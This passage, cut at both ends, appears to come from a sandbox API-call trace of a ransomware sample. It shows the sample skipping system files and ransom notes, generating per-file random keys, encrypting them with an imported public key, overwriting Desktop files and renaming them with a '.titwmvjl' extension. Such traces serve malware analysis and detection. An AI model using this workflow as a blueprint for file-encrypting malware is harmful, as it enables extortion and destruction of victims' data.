returned -1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="thumbs.db") returned -1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.076] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="ntldr") returned -1 [0089.076] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="NTDETECT.COM") returned -1 [0089.076] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="Bootfont.bin") returned 1 [0089.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3") returned 41 [0089.076] lstrlenW (lpString=".mp3") returned 4 [0089.076] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.076] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0089.076] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.076] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.076] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nhxpqxj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.077] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.077] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.077] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.078] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.079] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.079] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.080] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.080] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.080] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.080] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.080] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.080] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.080] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.081] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.082] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.082] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.082] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.082] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.082] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.082] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.082] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.082] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.084] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0089.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.084] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.084] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.084] GetLastError () returned 0x0 [0089.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.085] CryptDestroyKey (hKey=0x5036f8) returned 1 [0089.085] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.085] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.085] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.085] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.086] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.086] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5037b8) returned 1 [0089.086] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.086] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.087] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.087] GetLastError () returned 0x0 [0089.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.087] CryptDestroyKey (hKey=0x5037b8) returned 1 [0089.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.087] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.087] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.088] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.088] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xccb3, lpOverlapped=0x0) returned 1 [0089.094] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff334d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.094] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xccb3, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xccb3, lpOverlapped=0x0) returned 1 [0089.096] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.096] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.097] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.101] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.101] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.102] CloseHandle (hObject=0x2ac) returned 1 [0089.102] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nhxpqxj.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nhxpqxj.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0089.103] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.103] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.103] lstrcmpW (lpString1="NwZQ.png", lpString2=".") returned 1 [0089.103] lstrcmpW (lpString1="NwZQ.png", lpString2="..") returned 1 [0089.103] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="NwZQ.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png" [0089.103] lstrlenW (lpString=".titwmvjl") returned 9 [0089.103] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png") returned 38 [0089.103] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.103] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png.titwmvjl") returned 47 [0089.103] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png") returned 38 [0089.103] lstrlenW (lpString=".png") returned 4 [0089.103] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.104] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0089.104] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0089.104] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.104] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png") returned 38 [0089.104] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png") returned 38 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="desktop.ini") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="autorun.inf") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="ntuser.dat") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="iconcache.db") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="bootsect.bak") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="boot.ini") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="ntuser.dat.log") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="thumbs.db") returned -1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="KRAB-DECRYPT.html") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="CRAB-DECRYPT.html") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="ntldr") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="NTDETECT.COM") returned 1 [0089.104] lstrcmpiW (lpString1="NwZQ.png", lpString2="Bootfont.bin") returned 1 [0089.104] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png") returned 38 [0089.104] lstrlenW (lpString=".png") returned 4 [0089.104] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.105] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0089.105] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.105] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.105] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwzq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.105] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.105] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.106] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.106] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.108] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.108] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.108] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.108] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.108] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.108] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.109] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.109] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.110] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.111] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.111] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.111] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.111] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.111] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.111] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.113] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503438) returned 1 [0089.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.113] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.113] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.113] GetLastError () returned 0x0 [0089.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.114] CryptDestroyKey (hKey=0x503438) returned 1 [0089.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.114] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.114] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.115] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503638) returned 1 [0089.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.116] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.116] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.116] GetLastError () returned 0x0 [0089.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.116] CryptDestroyKey (hKey=0x503638) returned 1 [0089.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.116] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.116] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.117] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.117] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xcbb7, lpOverlapped=0x0) returned 1 [0089.124] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff3449, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.124] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xcbb7, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xcbb7, lpOverlapped=0x0) returned 1 [0089.126] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.126] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.128] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.133] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.134] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.134] CloseHandle (hObject=0x2ac) returned 1 [0089.135] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwzq.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NwZQ.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwzq.png.titwmvjl"), dwFlags=0x1) returned 1 [0089.136] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.136] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.136] lstrcmpW (lpString1="ONmHCIawZAQ6l.wav", lpString2=".") returned 1 [0089.136] lstrcmpW (lpString1="ONmHCIawZAQ6l.wav", lpString2="..") returned 1 [0089.136] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="ONmHCIawZAQ6l.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav" [0089.136] lstrlenW (lpString=".titwmvjl") returned 9 [0089.136] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav") returned 47 [0089.136] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.136] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav.titwmvjl") returned 56 [0089.136] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav") returned 47 [0089.136] lstrlenW (lpString=".wav") returned 4 [0089.136] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.137] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0089.137] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0089.137] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav") returned 47 [0089.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav") returned 47 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="desktop.ini") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="autorun.inf") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="ntuser.dat") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="iconcache.db") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="bootsect.bak") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="boot.ini") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="ntuser.dat.log") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="thumbs.db") returned -1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="CRAB-DECRYPT.html") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="ntldr") returned 1 [0089.137] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="NTDETECT.COM") returned 1 [0089.138] lstrcmpiW (lpString1="ONmHCIawZAQ6l.wav", lpString2="Bootfont.bin") returned 1 [0089.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav") returned 47 [0089.138] lstrlenW (lpString=".wav") returned 4 [0089.138] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.138] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0089.138] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.138] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.138] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ONmHCIawZAQ6l.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\onmhciawzaq6l.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.139] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.139] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.140] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.140] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.140] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.141] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.141] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.142] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.142] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.142] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.142] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.142] VirtualFree 